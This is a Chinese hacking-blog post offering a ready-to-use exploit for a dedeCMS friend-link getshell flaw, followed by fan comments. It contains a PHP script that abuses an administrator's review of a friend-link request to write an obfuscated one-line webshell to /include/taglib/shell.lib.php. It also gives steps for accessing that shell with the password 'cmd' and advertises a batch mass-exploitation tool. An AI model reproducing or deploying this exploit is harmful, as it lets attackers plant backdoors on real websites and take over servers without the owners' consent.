dedeCMS友情链接getshell漏洞利用工具(附exp)

  • 内容
  • 相关

不多说一类多说的吧直接上exp


<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
使用

代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。

站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php

御剑字典添加/include/taglib/shell.lib.php测试是否存活即可

最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);

密码为cmd


当然也有大牛研究出来了工具

2017-07-13

使用说明

1、左侧右键导入网址
2、中间右键点击配置可打开右侧功能区
3、修改key.ini文件里面的www.xxx.com/dede.php 替换成自己的即可
4、扫描完毕之后点击开始获取即可获取验证码,点击手工插入即可进行插入功能,下次会自动获取验证码,直接输入
验证码,进行手工插入即可。
4、多线程批量扫描,可自定义线程,可以导入大量url工作。

管理员设置回复可下载

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:dedeCMS友情链接getshell漏洞利用工具(附exp) - https://www.0dayhack.com/post-389.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

582条评论
  1. avatar

    xsstf Lv.1 Firefox 65.0 Firefox 65.0 Windows Windows 回复

    大佬牛逼666

    山东省 电信

    1. avatar

      xsstf Lv.1 Firefox 65.0 Firefox 65.0 Windows Windows 回复

      牛逼

      山东省 电信

      1. avatar

        xsstf Lv.1 Firefox 65.0 Firefox 65.0 Windows Windows 回复

        666666666666666666

        山东省 电信

        1. avatar

          孤独 Lv.1 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows 7 x64 Edition Windows 7 x64 Edition 回复

          大佬牛逼666

          江苏省常州市 电信

          1. avatar

            aaa Lv.1 Chrome 71.0.3578.98 Chrome 71.0.3578.98 Windows Windows 回复

            666666楼主牛逼

            山东省 电信

            1. avatar

              傲视苍穹 Lv.1 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows Windows 回复

              6666666666666666666666666666下载

              山东省 电信

              1. avatar

                womend Lv.2 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                确实,厉害。不一般

                山东省 电信

                1. avatar

                  womend Lv.2 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                  不错留一下    确实,厉害

                  山东省 电信

                  1. avatar

                    womend Lv.2 Chrome 63.0.3239.26 Chrome 63.0.3239.26 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                    不错留一下    确实

                    山东省 电信

                    1. avatar

                      duocai Lv.1 Chrome 71.0.3578.98 Chrome 71.0.3578.98 Windows 7 Windows 7 回复

                      求分享

                      山东省 电信